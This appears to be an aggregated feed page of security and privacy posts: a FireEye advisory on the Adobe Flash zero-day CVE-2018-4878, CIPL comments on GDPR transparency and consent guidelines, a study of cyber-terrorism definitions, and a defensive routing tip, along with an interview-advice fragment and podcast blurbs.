  10. The fact that you know you are overqualified for the job you're interviewing for, and that your plan is to take the job and quickly get promoted to a better job. For some reason, many interviewers find this information off-putting. I have been to countless HR gatherings where I heard folks complaining about "entitled" or "presumptuous" job applicants who had the nerve to say "This job is just a stepping stone for me." How dare they!
    Without a doubt, I agree. But if you are overqualified for the job, or you think you may well get bored, think again before saying yes to the employer. Refer to my previous articles on preparation and performance.

In general, when I appear for an interview, or when I interview someone, I prefer to be straightforward about my current situation, and I expect the same from the employer. The working relationship is essential and must not start with hiding information that can impact your performance. You will spend a third of your life at your workplace, and I don't think you want to kick it off by keeping critical facts hidden. Before you hide something, think about whether it would shock or merely surprise your employer if it were disclosed, and how well they would react.

Employee or employer, both have their commitments and deadlines. The person interviewing you, or the one managing you, needs to know if you hit hiccups along the way; otherwise their performance may also suffer because of you. So, think through these pointers again and share what you feel is necessary to set the right expectations.

Cheers, and best wishes.

This article shares my opinions and is by no means meant as an offense to the Forbes article. Please take it with a pinch of salt.

Hopefully Intel is working on a hardware solution of…

Hopefully Intel is working on a hardware solution to this flaw. An obvious approach is to add a fully isolated device that performs scheduled encryption of all sensitive information (which is not used for computation anyway); decryption would then happen only when a legitimate request takes longer than Meltdown's access window. Such a solution would help not only against Meltdown, but also against any attempt to grab a password without touching the keyboard.
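The comment proposes dedicated hardware, which software cannot replace, but the underlying idea can be sketched in Python: keep the secret masked at rest, re-mask it on a schedule, and expose plaintext only inside a short use window. The `SealedSecret` class and its XOR masking below are purely illustrative assumptions, not an actual Meltdown mitigation:

```python
import secrets


class SealedSecret:
    """Keep a secret masked in memory; unmask it only briefly on use.

    Illustrative only: a software XOR mask cannot stop Meltdown, since the
    mask lives in the same memory. It just sketches the design: secrets stay
    encrypted at rest and plaintext exists only inside a short window.
    """

    def __init__(self, secret: bytes):
        self._mask = secrets.token_bytes(len(secret))
        self._masked = bytes(a ^ b for a, b in zip(secret, self._mask))

    def rekey(self) -> None:
        # "Scheduled encryption": periodically swap in a fresh mask without
        # ever materializing the plaintext on its own.
        new_mask = secrets.token_bytes(len(self._masked))
        self._masked = bytes(
            m ^ o ^ n for m, o, n in zip(self._masked, self._mask, new_mask)
        )
        self._mask = new_mask

    def use(self, fn):
        # Decrypt only for the duration of the call, then drop the plaintext.
        plaintext = bytes(a ^ b for a, b in zip(self._masked, self._mask))
        try:
            return fn(plaintext)
        finally:
            del plaintext


secret = SealedSecret(b"hunter2")
secret.rekey()
assert secret.use(len) == 7
```

The hardware version the comment imagines would hold the mask (or key) in an isolated device, so that a speculative read of main memory only ever sees ciphertext.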

It Was Wide Open – Paul’s Security Weekly #546

This week, InfoSecWorld speakers Mark Arnold & Will Gragido join us for an interview! John Strand of Black Hills Information Security joins us for the Technical Segment on MITRE! In the news, we have updates from Discord, Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes:

Visit for all the latest episodes!

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.


Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommend that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation-state groups will attempt to exploit it in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

CIPL Submits Comments to Article 29 WP’s Proposed Guidelines on Transparency

On January 29, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP submitted formal comments to the Article 29 Working Party (the “Working Party”) on its Guidelines on Transparency (the “Guidelines”). The Guidelines were adopted by the Working Party on November 28, 2017, for public consultation.

CIPL acknowledges and appreciates the Working Party’s emphasis on user-centric transparency and the use of layered notices to achieve full disclosure, along with its statements on the use of visualization tools and the importance of avoiding overly technical or legalistic language in providing transparency. However, CIPL also identified several areas in the Guidelines that would benefit from further clarification or adjustment.

In its comments to the Guidelines, CIPL recommends several changes or clarifications the Working Party should incorporate in its final guidelines relating to elements of transparency under the EU GDPR, information to be provided to the data subject, information related to further processing, the exercise of data subjects’ rights, and exceptions to the obligation to provide information.

Some key recommendations include:

  • Clear and Concise yet Comprehensive Disclosure: The Guidelines should more clearly acknowledge the tension between asking for clear and concise notices and including all of the information required by the GDPR and recommended by the Working Party. CIPL believes Articles 13 and 14 of the GDPR already require sufficient information, and the risk-based approach gives organizations the opportunity to prioritize which information should be provided.
  • Consequences of Processing: The Working Party should amend their “best practice” recommendation that controllers “spell out” what the most important consequences of the processing will be. The Working Party should clarify that in providing information beyond what is required under the GDPR, controllers must be able to exercise their judgement on whether and how to provide such information.
  • Use of Certain Qualifiers: CIPL recommends removing the Working Party’s statement that qualifiers such as “may,” “might,” “some,” “often” and “possible” be avoided in privacy statements. Sometimes these terms are more appropriate than others. For instance, saying certain processing “will occur” is not as accurate as “may occur” when it is not certain whether the processing will in fact occur.
  • Proving Identity Orally: The Guidelines state that information may be provided orally to a data subject on request, provided that their identity is proven by other non-oral means. CIPL believes the Working Party should revise this statement, as voice recognition or verbal identity confirming questions and answers are valid mechanisms of proving one’s identity orally.
  • Updates to Privacy Notices: The Working Party should remove its suggestion that any changes to an existing privacy statement or notice must be notified to individuals. CIPL believes communications to individuals should be required only for changes having a significant impact.
  • Reminder Notices: The Working Party should remove the recommendation that the controller send reminder notices to individuals when processing occurs on an ongoing basis, even when they have already received the information. This is not required by the GDPR and individuals may feel overwhelmed or frustrated by such constant reminders. Individuals should, however, be able to easily pull such information from an accessible location.
  • New Purposes of Processing: The Guidelines should amend the statement and example suggesting that in addition to providing individuals new information in connection with a new purpose of processing, the controller, as a matter of best practice, should re-provide the individual with all of the information under the notice requirement received previously. CIPL believes this could potentially distract individuals from focusing on any new key information which could undermine transparency, and it should be up to the data controller to determine whether the re-provision of information would be useful.
  • Active Steps: The Working Party should clarify its statement that individuals should not have to take “active steps” to obtain information covered by Articles 13 and 14 of the GDPR, to the effect that clicking links to access notices would not constitute taking an “active step.”
  • Compatibility Analyses: The Working Party states that in connection with processing for compatibility purposes, organizations should provide individuals with “further information on the compatibility analysis carried out under Article 6(4).” CIPL believes such a requirement undermines transparency, as the information would provide little benefit to an individual’s understanding of the organization’s data processing, and burden organizations who have to reform, redact, compose and deliver such information.
  • Disproportionate Efforts: The Guidelines should acknowledge that the disproportionate efforts clause (Article 14(5)(b)) can be relied upon by controllers for purposes other than archiving in the public interest, scientific or historical research purposes or for statistical purposes (e.g., confirming identity or preventing fraud). The Working Party should also revise its statement that controllers who rely on Article 14(5)(b) should have to carry out a balancing exercise to assess the effort of the controller to provide the information versus the impact on the individual if not provided with the information. The GDPR does not require this and the disproportionality at issue refers to the disproportionality between the effort associated with the provision of such information and the intended data use.

To read the above recommendations in more detail along with all of CIPL’s other recommendations on transparency, view the full paper.

CIPL’s comments were developed based on input by the private sector participants in CIPL’s ongoing GDPR Implementation Project, which includes more than 90 individual private sector organizations. As part of this initiative, CIPL will continue to provide formal input about other GDPR topics the Working Party prioritizes.

CIPL Submits Comments to Article 29 WP’s Proposed Guidelines on Consent

On January 29, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP submitted formal comments to the Article 29 Working Party (the “Working Party”) on its Guidelines on Consent (the “Guidelines”). The Guidelines were adopted by the Working Party on November 28, 2017, for public consultation.

CIPL acknowledges and appreciates the Working Party’s elaboration on some of the consent-related requirements, such as providing information relevant to consent in layered format and the acknowledgment of both the push and pull models for providing such information. Additionally, CIPL welcomes the clear acknowledgement that controllers have the flexibility to develop consent experiences suitable to their organizations. However, CIPL also identified several areas in the Guidelines that would benefit from further clarification or adjustment.

In its comments to the Guidelines, CIPL recommends several changes or clarifications the Working Party should incorporate in its final guidelines relating to the elements of valid consent, rules on obtaining explicit consent, the interaction between consent and other processing grounds in the EU GDPR, and specific areas of concern such as scientific research and consent obtained under the Data Protection Directive.

Some key recommendations include:

  • Status of Consent: The Working Party should revise its statement that when initiating processing, controllers must always consider whether consent is the appropriate ground. No processing ground, including consent, is privileged over the others.
  • Imbalance of Power: The Guidelines should clarify what constitutes an imbalance of power outside of cases involving public authorities and employers, and emphasize that such imbalances occur in only narrow situations where the individual truly does not have a meaningful opportunity to consent.
  • Conditionality: The Working Party should clarify that incentivizing an individual (e.g., by reducing the generally applicable fee or providing additional features or services) to consent to additional processing should not be deemed inappropriate pressure preventing an individual from exercising their free will.
  • Informed: While it should be easy to identify directly what information relates to the consent sought, the Guidelines should clarify that it may be important to include such information in context with other information to provide a full picture to the individual and safeguard transparency.
  • Unambiguous Indication of Wishes: Consent must be expressed by a clear affirmative act and the Guidelines note that “merely proceeding with a service” cannot be regarded as such an act. The Working Party should clarify that “merely proceeding with a service” refers to a situation where no affirmative action is taking place at all. Completing a free-text field or other similar action may constitute a valid explicit affirmative act.
  • Obtaining Explicit Consent: The Guidelines should clarify that mechanisms for “regular” consent, as defined in the GDPR, may also meet the “explicit consent” standard.
  • Withdrawing Consent: The Working Party should clarify that withdrawal of consent should not automatically result in deletion of data processed prior to withdrawal. This may be contrary to the individual’s wishes, potentially interfere with other data subject rights (e.g., portability), and may even conflict with other regulations such as those regulating clinical trials or research.
  • Alternative Processing Grounds: The Guidelines should clarify that it is possible to have multiple grounds for one and the same processing, and if consent is withdrawn but another ground is available and the conditions for the validity of the alternative ground are met, the controller may continue to process the data.
  • Scientific Research: The Working Party should clarify that scientific research goes beyond medical research and also encompasses private sector R&D. Additionally, the Guidelines should revise the recommendation that providing a comprehensive research plan is a way to compensate for a lack of purpose specification related to research, as disclosures of such plans would carry risks for organizations’ intellectual property rights, undermine innovation and diminish transparency.
  • Consent under the Directive: The Working Party should revise its statement that all consents obtained under the Directive that do not meet the GDPR standard must be re-obtained. Organizations should only have to re-obtain such consents if there is a material change in the processing and its purposes, the consents do not comply with the GDPR rules on conditionality (Article 7(4)), or the requirements of Article 8(1) on processing children’s data have not been met.

To read the above recommendations in more detail, along with all of CIPL’s other recommendations on consent, view the full paper.

CIPL’s comments were developed based on input by the private sector participants in CIPL’s ongoing GDPR Implementation Project, which includes more than 90 individual private sector organizations. As part of this initiative, CIPL will continue to provide formal input about other GDPR topics the Working Party prioritizes.

Facebook Publishes Privacy Principles and Announces Introduction of Privacy Center

On January 28, 2018, Facebook published its privacy principles and announced that it will centralize its privacy settings in a single place. The principles were announced in a newsroom post by Facebook’s Chief Privacy Officer and include:

  • “We give you control of your privacy.”
  • “We help people understand how their data is used.”
  • “We design privacy into our products from the outset.”
  • “We work hard to keep your information secure.”
  • “You own and can delete your information.”
  • “Improvement is constant.”
  • “We are accountable.”

In conjunction with the publication of the privacy principles, Facebook also announced the creation of a new privacy center and an educational video campaign for its users that focuses on advertising, reviewing and deleting old posts, and deleting accounts. The videos will appear in users’ news feeds and will be refreshed throughout the year.

Declaring War on Cyber Terrorism…or Something Like That

This post is co-authored by Deana Shick, Eric Hatleback and Leigh Metcalf

Buzzwords are a mainstay in our field, and "cyberterrorism" currently is one of the hottest. We understand that terrorism is an idea, a tactic for actor groups to execute their own operations. Terrorists are known to operate in the physical world, mostly by spreading fear with traditional and non-traditional weaponry. As information security analysts, we also see products where "terrorists" are ranked in terms of sophistication, just like any other cyber threat actor group. But how does the definition of "terrorism" change when adding the complexities of the Internet? What does the term "cyber terrorism" actually mean?

We identified thirty-seven (37) unique definitions of "cyber terrorism" drawn from academic and international-relations journals, the web, and conference presentations. These definitions date back as far as 1998, with the most recent being published in 2016. We excluded any circular definitions based on the findings in our set. We broke down these definitions into their main components in order to analyze and compare definitions appropriately. The definitions, as a whole, broke into the following thirteen (13) categories, although no single definition included all of them at once:

  • Against Computers: Computers are a necessary target of the action.
  • Criminals: Actions performed are criminal acts, according to the relevant applicable law.
  • Fear: The action is intended to incite fear in the victims.
  • Hacking: The attempt to gain unauthorized access into a targeted network.
  • Religion: Religious tenets are a motivator to perform actions.
  • Socially Motivated: Social factors motivate actions on objectives.
  • Non-State Actors: Individuals or groups not formally allied to a recognized country or countries.
  • Politics: The political atmosphere and other occurrences within a country or countries motivate action.
  • Public Infrastructure: Government-owned infrastructure is a target of the action.
  • Against the public: Actions performed against a group of people, many of whom are bystanders.
  • Terrorism: Violence perpetrated by individuals to intimidate others into action.
  • Using Computers: Computers are used during actions on objectives.
  • Violence: The use of force to hurt or damage a target.

After binning each part of the definitions into these categories, we found that there is no consensus definition for "cyber terrorism." Our analysis of each definition is found in Figure 1. A factor that might explain the diversity of opinions could be the lack of a singular, agreed upon definition for "terrorism" on the international stage, even before adding the "cyber" adjective. So, what does this mean for us?
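The binning described above can be made concrete with a small sketch. The definitions and category assignments below are hypothetical placeholders, not the study's actual data; the point is only that once each definition is reduced to the set of categories it mentions, the lack of consensus is a one-line set intersection:

```python
# Each (hypothetical) definition, reduced to the categories it mentions.
definitions = {
    "def_1998": {"Against Computers", "Politics", "Violence"},
    "def_2004": {"Fear", "Non-State Actors", "Using Computers"},
    "def_2016": {"Hacking", "Politics", "Public Infrastructure"},
}

# Union: every category observed anywhere in the corpus.
all_categories = set().union(*definitions.values())

# Intersection: categories that EVERY definition includes -- a consensus core.
consensus = set.intersection(*definitions.values())

print(f"{len(all_categories)} categories observed")
print(f"categories shared by every definition: {consensus or 'none'}")
```

With the placeholder data, the intersection is empty, mirroring the study's finding that no single definition covers all the categories and no category appears in all the definitions.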

In the information security field, vendors, analysts, and researchers tend to slap the term "cyber" onto any actions involving an internet connection. While this may be appropriate in some cases, terrorism does not seem to translate well into bytes and packets. Perhaps this is due to the physical, visceral nature that terrorists require to be successful, or perhaps it is due to the lack of a true use-case of a terrorist group successfully detonating a computer. We should remain mindful as a community not to perpetuate fear, uncertainty, or doubt by using terms and varying adjectives without a common understanding.


Figure 1: Definitions found based on common bins


How to eliminate the default route for greater security

If portions of enterprise data-center networks have no need to communicate directly with the internet, then why do we configure routers so every system on the network winds up with internet access by default?

Part of the reason is that many enterprises use an internet perimeter firewall performing port address translation (PAT) with a default policy that allows access to the internet, a solution that leaves open a possible path by which attackers can breach security.
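As a sketch of the idea (the syntax is Cisco-IOS-style and the addresses are hypothetical; exact commands vary by vendor), an internal data-center router can drop its catch-all default route and carry only the specific prefixes that segment legitimately needs:

```
! A segment with no business reaching the internet: remove the default route
no ip route 0.0.0.0 0.0.0.0 192.0.2.1

! Route only the internal prefixes this segment actually uses
ip route 10.20.0.0 255.255.0.0 10.0.0.1
ip route 10.30.40.0 255.255.255.0 10.0.0.1
```

Hosts behind this router then have no path at all to arbitrary internet destinations, regardless of what the perimeter firewall's default PAT policy would otherwise allow.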




Growing North Korean cyber capability

Recent missile launches from the DPRK have received a lot of attention; however, its cyber offensives have also been active and are growing in sophistication. North Korean cyber attack efforts involve around 6,000 military operatives, within the structure of the Reconnaissance General Bureau (RGB) – part of the military of which Kim Jong-un is supreme …

Tactical Sweaters – Enterprise Security Weekly #78

This week, Paul and John interview Brendan O'Connor, Security CTO at ServiceNow, and John Moran, Senior Project Manager of DFLabs! In the news, we have updates from Twistlock, Microsoft, BeyondTrust, and more on this episode of Enterprise Security Weekly!

